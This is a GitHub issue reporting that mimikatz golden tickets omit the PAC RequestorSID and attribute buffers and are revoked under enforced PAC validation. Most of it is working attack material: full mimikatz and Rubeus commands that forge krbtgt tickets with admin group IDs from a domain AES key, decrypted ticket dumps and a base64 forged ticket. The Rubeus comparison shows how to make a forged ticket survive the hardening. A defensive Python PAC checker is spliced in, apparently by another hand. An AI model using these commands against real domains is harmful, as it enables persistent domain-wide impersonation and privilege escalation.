Mimikatz Golden Ticket fails to create PAC attribute RequestorSID #446

Open
g4uss47 opened this issue Apr 18, 2024 · 0 comments
g4uss47 commented Apr 18, 2024

Summary

I was getting KDC_TGT_Revoked errors using a golden ticket created with Mimikatz, which led me to an investigation. I found out that the golden ticket created by mimikatz was failing to create the PAC field correctly: it is not properly setting the RequestorSID and the AttributeFlags as it should, even though the program claims it is doing so.

This was done in an environment in which PAC validation is enforced; therefore, since the RequestorSID field is empty, the PAC validation fails and the golden ticket is revoked.

Replication Steps

Mimikatz Golden Ticket

I first generate a mimikatz golden ticket for a user called willywonka:
kerberos::golden /domain:chocolatefactory.local /user:willywonka /sid:S-1-5-21-2377760704-1974907900-3052042330 /id:2000 /aes256:EA2344691D140975946372D18949706857EB9C5F65855B0E159E54260BEB365C /ticket:golden_mimikatz.kirbi

And the execution claims that the PAC is generated and signed:

User      : willywonka
Domain    : chocolatefactory.local (CHOCOLATEFACTORY)
SID       : S-1-5-21-2377760704-1974907900-3052042330
User Id   : 2000
Groups Id : *513 512 520 518 519
ServiceKey: ea2344691d140975946372d18949706857eb9c5f65855b0e159e54260beb365c - aes256_hmac
Lifetime  : 18/04/2024 22:07:32 ; 16/04/2034 22:07:32 ; 16/04/2034 22:07:32
-> Ticket : golden_mimikatz.kirbi

 * PAC generated
 * PAC signed
 * EncTicketPart generated
 * EncTicketPart encrypted
 * KrbCred generated

However, as I said previously, this golden ticket was giving me the KDC_TGT_Revoked error, so I investigated and used Rubeus to take a look at what was actually inside the ticket:

.\Rubeus.exe describe /ticket:golden_mimikatz.kirbi /servicekey:EA2344691D140975946372D18949706857EB9C5F65855B0E159E54260BEB365C

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.3.2


[*] Action: Describe Ticket


  ServiceName              :  krbtgt/chocolatefactory.local
  ServiceRealm             :  chocolatefactory.local
  UserName                 :  willywonka (NT_PRINCIPAL)
  UserRealm                :  chocolatefactory.local
  StartTime                :  18/04/2024 22:02:54
  EndTime                  :  16/04/2034 22:02:54
  RenewTill                :  16/04/2034 22:02:54
  Flags                    :  pre_authent, initial, renewable, forwardable
  KeyType                  :  aes256_cts_hmac_sha1
  Base64(key)              :  yakUMo5Akb7g+D8UayZrl3rn8iaSkX6fULGG/yD1LRk=
  Block One Plain Text     :  6384000003613084
  Decrypted PAC            :
    LogonInfo              :
      LogonTime            : 18/04/2024 22:02:54
      LogoffTime           :
      KickOffTime          :
      PasswordLastSet      :
      PasswordCanChange    :
      PasswordMustChange   :
      EffectiveName        : willywonka
      FullName             :
      LogonScript          :
      ProfilePath          :
      HomeDirectory        :
      HomeDirectoryDrive   :
      LogonCount           : 0
      BadPasswordCount     : 0
      UserId               : 2000
      PrimaryGroupId       : 513
      GroupCount           : 5
      Groups               : 513,512,520,518,519
      UserFlags            : (0) 0
      UserSessionKey       : 0000000000000000
      LogonServer          :
      LogonDomainName      : CHOCOLATEFACTORY
      LogonDomainId        : S-1-5-21-2377760704-1974907900-3052042330
      UserAccountControl   : (528) NORMAL_ACCOUNT, DONT_EXPIRE_PASSWORD
      ExtraSIDCount        : 0
      ResourceGroupCount   : 0
    ClientName             :
      Client Id            : 18/04/2024 22:02:54
      Client Name          : willywonka
    ServerChecksum         :
      Signature Type       : KERB_CHECKSUM_HMAC_SHA1_96_AES256
      Signature            : 6B2DD580E09D063955E48C0E (VALID)
    KDCChecksum            :
      Signature Type       : KERB_CHECKSUM_HMAC_SHA1_96_AES256
      Signature            : AC649E0CC12A895B62D559F6 (VALID)

As we can see in the contents of the ticket, the Attribute Flags and RequestorSID are missing.

Rubeus Golden Ticket

In order to make a comparison I generated the same golden ticket using Rubeus:

.\Rubeus.exe golden /aes256:EA2344691D140975946372D18949706857EB9C5F65855B0E159E54260BEB365C /user:WillyWonka /id:2000 /domain:chocolatefactory.local /sid:S-1-5-21-2377760704-1974907900-3052042330 /displayname:"Willywonka" /netbios:WILLYWONKA /dc:dc1.chocolatefactory.local /outfile:golden_rubeus.kirbi

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.3.2

[*] Action: Build TGT

[*] Building PAC

[*] Domain         : CHOCOLATEFACTORY.LOCAL (WILLYWONKA)
[*] SID            : S-1-5-21-2377760704-1974907900-3052042330
[*] UserId         : 2000
[*] Groups         : 520,512,513,519,518
[*] ServiceKey     : EA2344691D140975946372D18949706857EB9C5F65855B0E159E54260BEB365C
[*] ServiceKeyType : KERB_CHECKSUM_HMAC_SHA1_96_AES256
[*] KDCKey         : EA2344691D140975946372D18949706857EB9C5F65855B0E159E54260BEB365C
[*] KDCKeyType     : KERB_CHECKSUM_HMAC_SHA1_96_AES256
[*] Service        : krbtgt
[*] Target         : chocolatefactory.local

[*] Generating EncTicketPart
[*] Signing PAC
[*] Encrypting EncTicketPart
[*] Generating Ticket
[*] Generated KERB-CRED
[*] Forged a TGT for '[email protected]'

[*] AuthTime       : 18/04/2024 22:14:11
[*] StartTime      : 18/04/2024 22:14:11
[*] EndTime        : 19/04/2024 8:14:11
[*] RenewTill      : 25/04/2024 22:14:11

[*] base64(ticket.kirbi):

      doIF/DCCBfigAwIBBaEDAgEWooIExzCCBMNhggS/MIIEu6ADAgEFoRgbFkNIT0NPTEFURUZBQ1RPUlku
      TE9DQUyiKzApoAMCAQKhIjAgGwZrcmJ0Z3QbFmNob2NvbGF0ZWZhY3RvcnkubG9jYWyjggRrMIIEZ6AD
      AgESoQMCAQOiggRZBIIEVSh74J4V+nesazrzIzWkFQcjoy/ECP4XYxkfAuKtbemKZTHQ9HqhndHk0UJN
      q3Kn76eNfF60PyaPz5Md17QbjxAEXISEvxXTLhiPDXTPLTLwe3fK2UpbxMBoFtfcAJIQnICr/+/eswuT
      WC2+x4vMYmotwsuMokHcTh9CsLchlUTD72w/hk1kfDVJk2MsS/9+lwqsuQi/jMvwlulttxlkZL7dFxXC
      RGmgca+L2slkSJCmOzLKjposzpgcMn4kf+ea7i43C2drKMJDQlgAiKl8EwgSZacOyJ6b3V1LgYTR3Xld
      0dLxH7ln4WbUPYPoBBQSLLv70yitxR1ddgfMjO+sRuanQ4KAvT9hn6efnfv7hIjWugjK4tmNOpwoF/fV
      cwo04GJVN9hqvkSKv9WQpGzlkBNyVSjHMMlJtkFQG45GDI4BiEkKMP//j5yzD7AQvOaCC5JEfvhX+/PY
      w1mu59Yt5gI/D98XnpyC8qFKdMF2JPpZUfrDF6W9dV7a0x3juiayXAI2OG5FqLmseTUCwrtA+07V8bK1
      BuZ5eF5ouEaHdi5Bz9TVsnl/WPCsSU9QziiREzth1pl30uemvBzk7GT2Aqwe6wF4u4eP72w0sC1dLG2O
      IGJTivxeWZ4cYlTuc2CyvUJmgKDGqM9NZXT0TUXHPO6pG/GQofD6s/qPUqqV0L9aoE/sMFuQCYvE9B6q
      6kZjWkwlwSFn5Zh8SmrAhtf+uRtQptHq7tFGnOQKsNjXw6x9suNm5rA1zShwB/xTaAB0KCT2xEtS2r45
      oCSdMWGbfZivpvnySfL6DAVGwfWmVGc44K26BS8hmofKC8sZ50L3SkqBIoresqRbbQW6wlYTIELZ4wws
      yZbxi/hMMcIoFlbW2vE/csE/t32Y+zslJzLTGMVaTsD52NA509kg6uq7alyaWiOy0iyAf/GtiPi1uWy2
      LhVpXuFn3qwyzMG8GzjTFGs6F7ap9YV1Kq0dpMTSNPW/AIyWsUJHSXWJTqnHcY8czHsFENuDRsJaoxzP
      I17uholPNiyewOBvEJ3xFQq+4jIPPREKWO8LVTvNuMgOBcEFD0WjRoNZlThkNbeeOBSv8HW3haJyzW9M
      YuRPHNc2Il+rM2qBFyrP9qMKlGrTAge1AJIVrnowLSftA9bO+y41NAIwXbnxbe2ZxnKkWMeaPdDxQ33K
      CMc98HqkKHkb1oDOehqTRaiGzrpZ6k7dOHW0hNsdyaNplxrOUQiEDkMB3ermEa3rq46kaAHR4Oj9bu52
      ceE+U5kcTSS5fx9OfHVh4OOw7rUyIDHRK6OJ4oaBDRnbzzwIeBTG4DKuqXk7AM7YHo/9wNUBG+fSRnRU
      T0B7XrAiI6TchqeNSNAC0k0DwyEO50V6mNvxM4+izxOIFCnpYwDXyjRvg+epEhUDLthDb9M2wW/3pgeG
      5nsN6fGuaEPa1ngWFHyJCMbjYqHjHbvXcZcVS8xNvFPT29GHHe57DJRfxEwfo4IBHzCCARugAwIBAKKC
      ARIEggEOfYIBCjCCAQagggECMIH/MIH8oCswKaADAgESoSIEIHdWu0LMUacB7alGdNU+BMpiDxjOoLmw
      OViutoIA0hMToRgbFkNIT0NPTEFURUZBQ1RPUlkuTE9DQUyiFzAVoAMCAQGhDjAMGwpXaWxseVdvbmth
      owcDBQBA4AAApBEYDzIwMjQwNDE4MjAxNDExWqURGA8yMDI0MDQxODIwMTQxMVqmERgPMjAyNDA0MTkw
      NjE0MTFapxEYDzIwMjQwNDI1MjAxNDExWqgYGxZDSE9DT0xBVEVGQUNUT1JZLkxPQ0FMqSswKaADAgEC
      oSIwIBsGa3JidGd0GxZjaG9jb2xhdGVmYWN0b3J5LmxvY2Fs

And analysing it in the same fashion as the golden ticket generated by mimikatz:

.\Rubeus.exe describe /ticket:golden_rubeus.kirbi /servicekey:EA2344691D140975946372D18949706857EB9C5F65855B0E159E54260BEB365C

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.3.2


[*] Action: Describe Ticket


  ServiceName              :  krbtgt/chocolatefactory.local
  ServiceRealm             :  CHOCOLATEFACTORY.LOCAL
  UserName                 :  WillyWonka (NT_PRINCIPAL)
  UserRealm                :  CHOCOLATEFACTORY.LOCAL
  StartTime                :  18/04/2024 22:03:08
  EndTime                  :  19/04/2024 8:03:08
  RenewTill                :  25/04/2024 22:03:08
  Flags                    :  pre_authent, initial, renewable, forwardable
  KeyType                  :  aes256_cts_hmac_sha1
  Base64(key)              :  NZ9U6rbvOS4pbfvj4uphZjm3T2wAdrIA6Grr/P/KFmo=
  Block One Plain Text     :  6382043530820431
  Decrypted PAC            :
    LogonInfo              :
      LogonTime            : 18/04/2024 22:03:08
      LogoffTime           :
      KickOffTime          :
      PasswordLastSet      :
      PasswordCanChange    :
      PasswordMustChange   :
      EffectiveName        : WillyWonka
      FullName             : Willywonka
      LogonScript          :
      ProfilePath          :
      HomeDirectory        :
      HomeDirectoryDrive   :
      LogonCount           : 0
      BadPasswordCount     : 0
      UserId               : 2000
      PrimaryGroupId       : 513
      GroupCount           : 5
      Groups               : 520,512,513,519,518
      UserFlags            : (0) 0
      UserSessionKey       : 0000000000000000
      LogonServer          : DC1
      LogonDomainName      : WILLYWONKA
      LogonDomainId        : S-1-5-21-2377760704-1974907900-3052042330
      UserAccountControl   : (16) NORMAL_ACCOUNT
      ExtraSIDCount        : 0
      ResourceGroupCount   : 0
    ClientName             :
      Client Id            : 18/04/2024 22:03:08
      Client Name          : WillyWonka
    UpnDns                 :
      DNS Domain Name      : CHOCOLATEFACTORY.LOCAL
      UPN                  : [email protected]
      Flags                : (1) NO_UPN_SET
    Attributes             :
      AttributeLength      : 2
      AttributeFlags       : (1) PAC_WAS_REQUESTED
    Requestor              :
      RequestorSID         : S-1-5-21-2377760704-1974907900-3052042330-2000
    ServerChecksum         :
      Signature Type       : KERB_CHECKSUM_HMAC_SHA1_96_AES256
      Signature            : F06ACD94A42E9BC2A49AA1F9 (VALID)
    KDCChecksum            :
      Signature Type       : KERB_CHECKSUM_HMAC_SHA1_96_AES256
      Signature            : 512F28A02087A2D1896FB6A1 (VALID)

The AttributeFlags field is properly set to PAC_WAS_REQUESTED and the RequestorSID is properly set.
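
A defender-side check for the difference the two describe outputs show, added here as an example; it is not code from the issue, from mimikatz or from Rubeus. It walks the PACTYPE header of an already-decrypted PAC, looks for the PAC_ATTRIBUTES_INFO (0x11) and PAC_REQUESTOR (0x12) buffers that a KDC enforcing PAC validation expects (both were introduced by the KB5008380 hardening), decodes them and reports what is missing or does not match the expected user SID. Buffer type numbers and the two buffer layouts follow MS-PAC; the two fixtures are constructed to mirror the buffer sets in the two describe outputs above, with every other buffer body a zero-filled placeholder and nothing signed, so they are not real tickets.

```python
import struct

# PAC buffer types from the PAC_INFO_BUFFER header (MS-PAC section 2.4).
PAC_LOGON_INFO = 0x01
PAC_SERVER_CHECKSUM = 0x06
PAC_PRIVSVR_CHECKSUM = 0x07      # the "KDCChecksum" in the Rubeus output
PAC_CLIENT_INFO = 0x0A           # "ClientName" in the Rubeus output
PAC_UPN_DNS_INFO = 0x0C
PAC_ATTRIBUTES_INFO = 0x11       # "Attributes" / AttributeFlags
PAC_REQUESTOR = 0x12             # "Requestor" / RequestorSID

# Bits of PAC_ATTRIBUTES_INFO.Flags (MS-PAC section 2.14).
PAC_WAS_REQUESTED = 0x1
PAC_WAS_GIVEN_IMPLICITLY = 0x2


def parse_pac_buffers(blob: bytes) -> dict:
    """Walk the PACTYPE header (cBuffers, Version, PAC_INFO_BUFFER[]) -> {ulType: bytes}."""
    cbuffers, version = struct.unpack_from("<II", blob, 0)
    if version != 0:
        raise ValueError(f"unexpected PACTYPE version {version}")
    buffers = {}
    for i in range(cbuffers):
        ultype, size, offset = struct.unpack_from("<IIQ", blob, 8 + 16 * i)
        if offset + size > len(blob):
            raise ValueError(f"buffer type 0x{ultype:x} runs past the end of the PAC")
        buffers[ultype] = blob[offset:offset + size]
    return buffers


def parse_sid(data: bytes) -> str:
    """Decode a binary SID: revision, count, 48-bit big-endian authority, LE sub-authorities."""
    revision, count = data[0], data[1]
    authority = int.from_bytes(data[2:8], "big")
    subs = struct.unpack_from(f"<{count}I", data, 8)
    return "S-%d-%d-%s" % (revision, authority, "-".join(str(s) for s in subs))


def parse_attributes_info(data: bytes) -> int:
    """Return the first Flags word of PAC_ATTRIBUTES_INFO; FlagsLength counts bits."""
    flags_length = struct.unpack_from("<I", data, 0)[0]
    nwords = (flags_length + 31) // 32
    return struct.unpack_from(f"<{nwords}I", data, 4)[0] if nwords else 0


def check_pac(blob: bytes, domain_sid: str, user_rid: int) -> dict:
    """Report the buffers present and whether Attributes/Requestor match the expected user."""
    bufs = parse_pac_buffers(blob)
    report = {"buffer_types": sorted(bufs), "attribute_flags": None,
              "requestor_sid": None, "findings": []}
    if PAC_ATTRIBUTES_INFO in bufs:
        report["attribute_flags"] = parse_attributes_info(bufs[PAC_ATTRIBUTES_INFO])
    else:
        report["findings"].append("PAC_ATTRIBUTES_INFO (0x11) buffer missing")
    if PAC_REQUESTOR in bufs:
        sid = parse_sid(bufs[PAC_REQUESTOR])
        report["requestor_sid"] = sid
        expected = f"{domain_sid}-{user_rid}"
        if sid != expected:
            report["findings"].append(f"RequestorSID {sid} does not match {expected}")
    else:
        report["findings"].append("PAC_REQUESTOR (0x12) buffer missing")
    return report


# --- constructed fixtures (not real tickets): every buffer body except the two
# under discussion is a zero-filled placeholder, and nothing is signed. -------
def sid_to_bytes(sid: str) -> bytes:
    parts = sid.split("-")
    revision, authority, subs = int(parts[1]), int(parts[2]), [int(p) for p in parts[3:]]
    return (bytes([revision, len(subs)]) + authority.to_bytes(6, "big")
            + struct.pack(f"<{len(subs)}I", *subs))


def build_pac(buffers) -> bytes:
    """Pack a PACTYPE header followed by the buffers, each padded to 8 bytes."""
    header, body = struct.pack("<II", len(buffers), 0), b""
    offset = 8 + 16 * len(buffers)
    for ultype, data in buffers:
        header += struct.pack("<IIQ", ultype, len(data), offset)
        body += data + b"\x00" * (-len(data) % 8)
        offset += len(data) + (-len(data) % 8)
    return header + body


DOMAIN_SID = "S-1-5-21-2377760704-1974907900-3052042330"   # domain SID from the issue
USER_RID = 2000                                            # /id:2000 from the issue
PLACEHOLDER = b"\x00" * 16

# Buffer set the mimikatz describe output showed: LogonInfo, ClientName, two checksums.
MIMIKATZ_LAYOUT = build_pac([
    (PAC_LOGON_INFO, PLACEHOLDER), (PAC_CLIENT_INFO, PLACEHOLDER),
    (PAC_SERVER_CHECKSUM, PLACEHOLDER), (PAC_PRIVSVR_CHECKSUM, PLACEHOLDER)])

# Buffer set the Rubeus describe output showed, with the two extra buffers filled
# the way Rubeus reported them (FlagsLength 2, PAC_WAS_REQUESTED; domain SID + RID).
RUBEUS_LAYOUT = build_pac([
    (PAC_LOGON_INFO, PLACEHOLDER), (PAC_CLIENT_INFO, PLACEHOLDER),
    (PAC_UPN_DNS_INFO, PLACEHOLDER),
    (PAC_ATTRIBUTES_INFO, struct.pack("<II", 2, PAC_WAS_REQUESTED)),
    (PAC_REQUESTOR, sid_to_bytes(f"{DOMAIN_SID}-{USER_RID}")),
    (PAC_SERVER_CHECKSUM, PLACEHOLDER), (PAC_PRIVSVR_CHECKSUM, PLACEHOLDER)])

if __name__ == "__main__":
    print(check_pac(MIMIKATZ_LAYOUT, DOMAIN_SID, USER_RID), check_pac(RUBEUS_LAYOUT, DOMAIN_SID, USER_RID), sep="\n")
```

Run against the mimikatz-shaped fixture, `check_pac` reports both buffers missing, which is the condition the issue attributes the KDC_TGT_Revoked error to; against the Rubeus-shaped fixture it decodes `AttributeFlags` 1 and the `-2000` RequestorSID and reports nothing. Feeding it a different expected RID shows the third failure mode a validating KDC cares about, a Requestor buffer that is present but names a different account. On real traffic the input would be the PAC buffer from an EncTicketPart decrypted with the krbtgt key, the same step `Rubeus describe /servicekey:` performs above.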

@g4uss47 g4uss47 changed the title Mimikatz Golden Ticket fails to create PAC Mimikatz Golden Ticket fails to create PAC attribute and fails when using it in a domain where PAC validation is enforced Apr 18, 2024
@g4uss47 g4uss47 changed the title Mimikatz Golden Ticket fails to create PAC attribute and fails when using it in a domain where PAC validation is enforced Mimikatz Golden Ticket fails to create PAC attribute RequestorSID and fails when using it in a domain where PAC validation is enforced Apr 18, 2024
@g4uss47 g4uss47 changed the title Mimikatz Golden Ticket fails to create PAC attribute RequestorSID and fails when using it in a domain where PAC validation is enforced Mimikatz Golden Ticket fails to create PAC attribute RequestorSID Apr 18, 2024